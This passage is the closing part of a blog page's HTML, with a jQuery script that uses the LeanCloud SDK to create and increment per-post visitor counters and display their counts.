                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
